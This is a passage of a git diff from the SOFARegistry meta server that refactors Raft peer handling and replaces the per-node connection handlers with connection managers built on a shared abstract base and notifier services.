if (!status.isOk()) { - LOGGER.error("CliService reset peer fail!error message {}", - status.getErrorMsg()); - throw new RuntimeException("CliService reset peer fail!error message " - + status.getErrorMsg()); - } - } else { - LOGGER.error("cliService can't be null,it must be init first!"); - throw new RuntimeException("cliService can't be null,it must be init first!"); - } - } catch (Exception e) { - LOGGER.error("CliService reset peer error!", e); - throw new RuntimeException("CliService reset peer error!", e); - } - } - - /** - * api for remove meta node - * @param ipAddress - */ - public void removePeer(String ipAddress) { - try { - if (cliService != null) { - PeerId peer = new PeerId(ipAddress, metaServerConfig.getRaftServerPort()); - Status status = cliService.removePeer(getGroup(), getCurrentConfiguration(), peer); - if (!status.isOk()) { - LOGGER.error("CliService remove peer fail!error message {}", - status.getErrorMsg()); - throw new RuntimeException("CliService remove peer fail!error message " - + status.getErrorMsg()); - } - } else { - LOGGER.error("cliService can't be null,it must be init first!"); - throw new RuntimeException("cliService can't be null,it must be init first!"); - } - } catch (Exception e) { - LOGGER.error("CliService remove peer error!", e); - throw new RuntimeException("CliService remove peer error!", e); - } - } - - /** - * api for get all peers - */ - public List getPeers() { - try { - Configuration currentConf = getCurrentConfiguration(); - return currentConf.getPeers(); - } catch (Exception e) { - String msg = "Get peers error:" + e.getMessage(); - LOGGER.error(msg, e); - throw new RuntimeException(msg, e); - } - } - - private Configuration getCurrentConfiguration() { - return ((NodeImpl) raftServer.getNode()).getCurrentConf(); - } - - /** - * refresh configuration and refresh leader - */ - public void refreshRaftClient() { - raftClient.refreshLeader(); - } - - public void shutdown() { - if (raftServer != null) { - raftServer.shutdown(); - } - if (raftClient != null) { - raftClient.shutdown(); - } - if (cliService != null) { - cliService.shutdown(); - } - } - - private String getServerConfig() { - String ret = ""; - Set ips = nodeConfig.getDataCenterMetaServers(nodeConfig.getLocalDataCenter()); - if (ips != null && !ips.isEmpty()) { - ret = ips.stream().map(ip -> ip + ":" + metaServerConfig.getRaftServerPort()) - .collect(Collectors.joining(",")); - } - if (ret.isEmpty()) { - throw new IllegalArgumentException("Init raft server config error!"); - } - return ret; - } - - private String getGroup() { - return metaServerConfig.getRaftGroup() + "_" + nodeConfig.getLocalDataCenter(); - } - - /** - * Getter method for property raftClient. - * - * @return property value of raftClient - */ - public RaftClient getRaftClient() { - return raftClient; - } - - /** - * Getter method for property clientStart. - * - * @return property value of clientStart - */ - public AtomicBoolean getClientStart() { - return clientStart; - } - - /** - * Getter method for property serverStart. - * - * @return property value of serverStart - */ - public AtomicBoolean getServerStart() { - return serverStart; - } - - /** - * Getter method for property clsStart. - * - * @return property value of clsStart - */ - public AtomicBoolean getClsStart() { - return clsStart; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/SessionNodeExchanger.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/SessionNodeExchanger.java index eeb677d8b..736d7f49d 100644 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/SessionNodeExchanger.java +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/SessionNodeExchanger.java @@ -16,69 +16,27 @@ */ package com.alipay.sofa.registry.server.meta.remoting; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.Client; -import com.alipay.sofa.registry.remoting.Server; -import com.alipay.sofa.registry.remoting.exchange.Exchange; -import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; -import com.alipay.sofa.registry.remoting.exchange.RequestException; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.remoting.exchange.message.Response; -import com.alipay.sofa.registry.server.meta.bootstrap.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.shared.remoting.ServerSideExchanger; import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; /** - * * @author shangyu.wh * @version $Id: SessionNodeExchanger.java, v 0.1 2018-01-15 21:21 shangyu.wh Exp $ */ -public class SessionNodeExchanger implements NodeExchanger { - - private static final Logger LOGGER = LoggerFactory.getLogger(SessionNodeExchanger.class); - - @Autowired - private Exchange boltExchange; - - @Autowired - private MetaServerConfig metaServerConfig; - - @Override - public Response request(Request request) throws RequestException { - Response response = null; - - if (LOGGER.isDebugEnabled()) { - LOGGER.debug("SessionNodeExchanger request body:{} url:{}", request.getRequestBody(), - request.getRequestUrl()); - } - - Server sessionServer = boltExchange.getServer(metaServerConfig.getSessionServerPort()); - - if (sessionServer != null) { - - Channel channel = sessionServer.getChannel(request.getRequestUrl()); - if (channel != null && channel.isConnected()) { - final Object result = sessionServer.sendSync(channel, request.getRequestBody(), - metaServerConfig.getSessionNodeExchangeTimeout()); - response = () -> result; - } else { - String errorMsg = "SessionNode Exchanger get channel error! channel with url:" - + channel == null ? "" : channel.getRemoteAddress() + " can not be null or disconnected!"; - LOGGER.error(errorMsg); - throw new RequestException(errorMsg, request); - } +@Component +public class SessionNodeExchanger extends ServerSideExchanger { - } + @Autowired private MetaServerConfig metaServerConfig; - if (LOGGER.isDebugEnabled()) { - LOGGER.debug("SessionNodeExchanger response result:{} ", response.getResult()); - } - return response; - } + @Override + public int getRpcTimeoutMillis() { + return metaServerConfig.getSessionNodeExchangeTimeoutMillis(); + } - @Override - public Client connectServer() { - return null; - } -} \ No newline at end of file + @Override + public int getServerPort() { + return metaServerConfig.getSessionServerPort(); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/AbstractNodeConnectManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/AbstractNodeConnectManager.java new file mode 100644 index 000000000..7bc190039 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/AbstractNodeConnectManager.java @@ -0,0 +1,49 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.connection; + +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.Server; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.google.common.collect.Lists; +import java.net.InetSocketAddress; +import java.util.Collection; +import java.util.Collections; +import java.util.List; +import org.springframework.beans.factory.annotation.Autowired; + +public abstract class AbstractNodeConnectManager implements NodeConnectManager { + @Autowired protected Exchange boltExchange; + @Autowired protected MetaServerConfig metaServerConfig; + + @Override + public Collection getConnections(String dataCenter) { + Server server = boltExchange.getServer(getServerPort()); + if (server == null) { + return Collections.emptyList(); + } + List channels = server.getChannels(); + List ret = Lists.newArrayListWithCapacity(channels.size()); + for (Channel channel : channels) { + ret.add(channel.getRemoteAddress()); + } + return ret; + } + + protected abstract int getServerPort(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/DataConnectionHandler.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/DataConnectionHandler.java deleted file mode 100644 index 58f95bee7..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/DataConnectionHandler.java +++ /dev/null @@ -1,80 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.remoting.connection; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.net.NetUtil; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.RemotingException; -import com.alipay.sofa.registry.server.meta.remoting.handler.AbstractServerHandler; - -import java.net.InetSocketAddress; -import java.util.Collection; -import java.util.Map; -import java.util.concurrent.ConcurrentHashMap; - -/** - * Handle data node's connect request - * @author shangyu.wh - * @version $Id: DataConnectionHandler.java, v 0.1 2018-01-24 16:04 shangyu.wh Exp $ - */ -public class DataConnectionHandler extends AbstractServerHandler implements NodeConnectManager { - private Map connections = new ConcurrentHashMap<>(); - - @Override - public void connected(Channel channel) throws RemotingException { - super.connected(channel); - addConnection(channel); - } - - @Override - public void disconnected(Channel channel) throws RemotingException { - super.disconnected(channel); - removeConnection(channel); - } - - @Override - public HandlerType getType() { - return HandlerType.LISENTER; - } - - @Override - public void addConnection(Channel channel) { - InetSocketAddress remoteAddress = channel.getRemoteAddress(); - String connectId = NetUtil.toAddressString(remoteAddress); - connections.putIfAbsent(connectId, remoteAddress); - } - - @Override - public boolean removeConnection(Channel channel) { - InetSocketAddress remoteAddress = channel.getRemoteAddress(); - String connectId = NetUtil.toAddressString(remoteAddress); - - return connections.remove(connectId) != null; - } - - @Override - public Collection getConnections(String dataCenter) { - return connections.values(); - } - - @Override - public NodeType getNodeType() { - return NodeType.DATA; - } - -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/DataConnectionManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/DataConnectionManager.java new file mode 100644 index 000000000..05333bb13 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/DataConnectionManager.java @@ -0,0 +1,38 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.connection; + +import com.alipay.sofa.registry.common.model.Node.NodeType; + +/** + * Handle data node's connect request + * + * @author shangyu.wh + * @version $Id: DataConnectionManager.java, v 0.1 2018-01-24 16:04 shangyu.wh Exp $ + */ +public class DataConnectionManager extends AbstractNodeConnectManager { + + @Override + public NodeType getConnectNodeType() { + return NodeType.DATA; + } + + @Override + protected int getServerPort() { + return metaServerConfig.getDataServerPort(); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/MetaConnectionHandler.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/MetaConnectionHandler.java deleted file mode 100644 index 2e4699278..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/MetaConnectionHandler.java +++ /dev/null @@ -1,117 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.remoting.connection; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.net.NetUtil; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.RemotingException; -import com.alipay.sofa.registry.server.meta.bootstrap.NodeConfig; -import com.alipay.sofa.registry.server.meta.remoting.handler.AbstractServerHandler; -import org.springframework.beans.factory.annotation.Autowired; - -import java.net.InetSocketAddress; -import java.util.Collection; -import java.util.Map; -import java.util.concurrent.ConcurrentHashMap; - -/** - * Handle meta node's connect request - * @author shangyu.wh - * @version $Id: MetaConnectionHandler.java, v 0.1 2018-02-12 15:01 shangyu.wh Exp $ - */ -public class MetaConnectionHandler extends AbstractServerHandler implements NodeConnectManager { - - private static final Logger LOGGER = LoggerFactory - .getLogger(MetaConnectionHandler.class); - - @Autowired - private NodeConfig nodeConfig; - - private Map> connections = new ConcurrentHashMap<>(); - - @Override - public void connected(Channel channel) throws RemotingException { - super.connected(channel); - addConnection(channel); - } - - @Override - public void disconnected(Channel channel) throws RemotingException { - super.disconnected(channel); - removeConnection(channel); - } - - @Override - public HandlerType getType() { - return HandlerType.LISENTER; - } - - @Override - public void addConnection(Channel channel) { - InetSocketAddress remoteAddress = channel.getRemoteAddress(); - String connectId = NetUtil.toAddressString(remoteAddress); - String ipAddress = remoteAddress.getAddress().getHostAddress(); - - String dataCenter = nodeConfig.getMetaDataCenter(ipAddress); - if (dataCenter != null) { - Map connectMap = connections.get(dataCenter); - if (connectMap == null) { - final Map newMap = new ConcurrentHashMap<>(); - connectMap = connections.putIfAbsent(dataCenter, newMap); - if (connectMap == null) { - connectMap = newMap; - } - } - connectMap.putIfAbsent(connectId, remoteAddress); - } - } - - @Override - public boolean removeConnection(Channel channel) { - InetSocketAddress remoteAddress = channel.getRemoteAddress(); - String connectId = NetUtil.toAddressString(remoteAddress); - String ipAddress = remoteAddress.getAddress().getHostAddress(); - - String dataCenter = nodeConfig.getMetaDataCenter(ipAddress); - if (dataCenter != null) { - Map connectMap = connections.get(dataCenter); - if (connectMap != null) { - connectMap.remove(connectId); - return true; - } - } - return false; - } - - @Override - public Collection getConnections(String dataCenter) { - Map connectMap = connections.get(dataCenter); - if (connectMap == null || connectMap.isEmpty()) { - LOGGER.error("Can not find connection of dataCenter {}", dataCenter); - throw new RuntimeException("Can not find connection of dataCenter:" + dataCenter); - } - return connectMap.values(); - } - - @Override - public NodeType getNodeType() { - return NodeType.META; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/MetaConnectionManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/MetaConnectionManager.java new file mode 100644 index 000000000..f773826bb --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/MetaConnectionManager.java @@ -0,0 +1,65 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.connection; + +import com.alipay.sofa.registry.common.model.Node.NodeType; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.google.common.collect.Lists; +import java.net.InetSocketAddress; +import java.util.Collection; +import java.util.Collections; +import java.util.List; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * Handle meta node's connect request + * + * @author shangyu.wh + * @version $Id: MetaConnectionManager.java, v 0.1 2018-02-12 15:01 shangyu.wh Exp $ + */ +public class MetaConnectionManager extends AbstractNodeConnectManager { + + @Autowired private NodeConfig nodeConfig; + + @Override + public Collection getConnections(String dataCenter) { + // get all address, the dataCenter arg is ignored + Collection addresses = super.getConnections(dataCenter); + if (addresses.isEmpty()) { + return Collections.emptyList(); + } + List ret = Lists.newArrayList(); + for (InetSocketAddress address : addresses) { + String ipAddress = address.getAddress().getHostAddress(); + String dc = nodeConfig.getMetaDataCenter(ipAddress); + if (dataCenter.equals(dc)) { + ret.add(address); + } + } + return ret; + } + + @Override + protected int getServerPort() { + return metaServerConfig.getMetaServerPort(); + } + + @Override + public NodeType getConnectNodeType() { + return NodeType.META; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/NodeConnectManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/NodeConnectManager.java index fc83092f3..dbde51162 100644 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/NodeConnectManager.java +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/NodeConnectManager.java @@ -17,23 +17,16 @@ package com.alipay.sofa.registry.server.meta.remoting.connection; import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.remoting.Channel; - import java.net.InetSocketAddress; import java.util.Collection; /** - * * @author shangyu.wh * @version $Id: NodeConnectManager.java, v 0.1 2018-01-24 10:57 shangyu.wh Exp $ */ public interface NodeConnectManager { - void addConnection(Channel channel); - - boolean removeConnection(Channel channel); - - Collection getConnections(String dataCenter); + Collection getConnections(String dataCenter); - NodeType getNodeType(); -} \ No newline at end of file + NodeType getConnectNodeType(); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/SessionConnectionHandler.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/SessionConnectionHandler.java deleted file mode 100644 index 49aa5e211..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/SessionConnectionHandler.java +++ /dev/null @@ -1,79 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.remoting.connection; - -import com.alipay.sofa.registry.common.model.Node.NodeType; -import com.alipay.sofa.registry.net.NetUtil; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.RemotingException; -import com.alipay.sofa.registry.server.meta.remoting.handler.AbstractServerHandler; - -import java.net.InetSocketAddress; -import java.util.Collection; -import java.util.Map; -import java.util.concurrent.ConcurrentHashMap; - -/** - * Handle session node's connect request - * @author shangyu.wh - * @version $Id: ServerConnectionHandler.java, v 0.1 2018-01-24 11:42 shangyu.wh Exp $ - */ -public class SessionConnectionHandler extends AbstractServerHandler implements NodeConnectManager { - - private Map connections = new ConcurrentHashMap<>(); - - @Override - public void connected(Channel channel) throws RemotingException { - super.connected(channel); - addConnection(channel); - } - - @Override - public void disconnected(Channel channel) throws RemotingException { - super.disconnected(channel); - removeConnection(channel); - } - - @Override - public void addConnection(Channel channel) { - InetSocketAddress remoteAddress = channel.getRemoteAddress(); - String connectId = NetUtil.toAddressString(remoteAddress); - connections.putIfAbsent(connectId, remoteAddress); - } - - @Override - public boolean removeConnection(Channel channel) { - String connectId = NetUtil.toAddressString(channel.getRemoteAddress()); - return connections.remove(connectId) != null; - } - - @Override - public Collection getConnections(String dataCenter) { - return connections.values(); - } - - @Override - public HandlerType getType() { - return HandlerType.LISENTER; - } - - @Override - public NodeType getNodeType() { - return NodeType.SESSION; - } - -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/SessionConnectionManager.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/SessionConnectionManager.java new file mode 100644 index 000000000..e1470b549 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/connection/SessionConnectionManager.java @@ -0,0 +1,38 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.connection; + +import com.alipay.sofa.registry.common.model.Node.NodeType; + +/** + * Handle session node's connect request + * + * @author shangyu.wh + * @version $Id: ServerConnectionHandler.java, v 0.1 2018-01-24 11:42 shangyu.wh Exp $ + */ +public class SessionConnectionManager extends AbstractNodeConnectManager { + + @Override + public NodeType getConnectNodeType() { + return NodeType.SESSION; + } + + @Override + protected int getServerPort() { + return metaServerConfig.getSessionServerPort(); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/data/DataServerService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/data/DataServerService.java new file mode 100644 index 000000000..d69b5ef13 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/data/DataServerService.java @@ -0,0 +1,25 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.data; + +import com.alipay.sofa.registry.server.meta.remoting.notifier.Notifier; + +/** + * @author chen.zhu + *

Feb 23, 2021 + */ +public interface DataServerService extends Notifier {} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/data/DefaultDataServerService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/data/DefaultDataServerService.java new file mode 100644 index 000000000..29f4f44bf --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/data/DefaultDataServerService.java @@ -0,0 +1,76 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.data; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; +import com.alipay.sofa.registry.server.meta.lease.data.DataServerManager; +import com.alipay.sofa.registry.server.meta.remoting.DataNodeExchanger; +import com.alipay.sofa.registry.server.meta.remoting.connection.NodeConnectManager; +import com.alipay.sofa.registry.server.meta.remoting.notifier.AbstractNotifier; +import com.google.common.annotations.VisibleForTesting; +import java.util.List; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; + +/** + * @author chen.zhu + *

Dec 03, 2020 + */ +@Component +public class DefaultDataServerService extends AbstractNotifier + implements DataServerService { + + @Autowired private DataNodeExchanger dataNodeExchanger; + + @Autowired private NodeConnectManager dataConnectionManager; + + @Autowired private DataServerManager dataServerManager; + + @Override + protected NodeExchanger getNodeExchanger() { + return dataNodeExchanger; + } + + @Override + protected List getNodes() { + return dataServerManager.getDataServerMetaInfo().getClusterMembers(); + } + + @Override + protected NodeConnectManager getNodeConnectManager() { + return dataConnectionManager; + } + + @VisibleForTesting + DefaultDataServerService setDataNodeExchanger(DataNodeExchanger dataNodeExchanger) { + this.dataNodeExchanger = dataNodeExchanger; + return this; + } + + @VisibleForTesting + DefaultDataServerService setDataConnectionManager(NodeConnectManager dataConnectionManager) { + this.dataConnectionManager = dataConnectionManager; + return this; + } + + @VisibleForTesting + DefaultDataServerService setDataServerManager(DataServerManager dataServerManager) { + this.dataServerManager = dataServerManager; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/AbstractServerHandler.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/AbstractServerHandler.java deleted file mode 100644 index 5bcb55119..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/AbstractServerHandler.java +++ /dev/null @@ -1,70 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.remoting.handler; - -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.ChannelHandler; -import com.alipay.sofa.registry.remoting.RemotingException; - -/** - * - * @author shangyu.wh - * @version $Id: ServerHandler.java, v 0.1 2017-11-28 18:06 shangyu.wh Exp $ - */ -public abstract class AbstractServerHandler implements ChannelHandler { - - private static final Logger LOGGER = LoggerFactory.getLogger("META-CONNECT"); - - @Override - public void connected(Channel channel) throws RemotingException { - if (channel != null && channel.isConnected()) { - LOGGER.info("Server connected,remote address:" + channel.getRemoteAddress() - + " localAddress:" + channel.getLocalAddress()); - } - } - - @Override - public void disconnected(Channel channel) throws RemotingException { - if (channel != null && !channel.isConnected()) { - LOGGER.info("Server disconnected,remote address:" + channel.getRemoteAddress() - + " localAddress:" + channel.getLocalAddress()); - } - } - - @Override - public void caught(Channel channel, T message, Throwable exception) { - - } - - @Override - public void received(Channel channel, T message) { - - } - - @Override - public Object reply(Channel channel, T message) { - return null; - } - - @Override - public Class interest() { - return null; - } - -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/BaseMetaServerHandler.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/BaseMetaServerHandler.java new file mode 100644 index 000000000..2e19b4b35 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/BaseMetaServerHandler.java @@ -0,0 +1,42 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.handler; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.server.shared.remoting.AbstractServerHandler; +import java.util.concurrent.Executor; +import java.util.concurrent.ThreadPoolExecutor; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author shangyu.wh + * @version $Id: ServerHandler.java, v 0.1 2017-11-28 18:06 shangyu.wh Exp $ + */ +public abstract class BaseMetaServerHandler extends AbstractServerHandler { + + @Autowired private ThreadPoolExecutor defaultRequestExecutor; + + @Override + public Executor getExecutor() { + return defaultRequestExecutor; + } + + @Override + protected Node.NodeType getConnectNodeType() { + return null; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/DataNodeHandler.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/DataNodeHandler.java deleted file mode 100644 index 06408669f..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/handler/DataNodeHandler.java +++ /dev/null @@ -1,61 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache 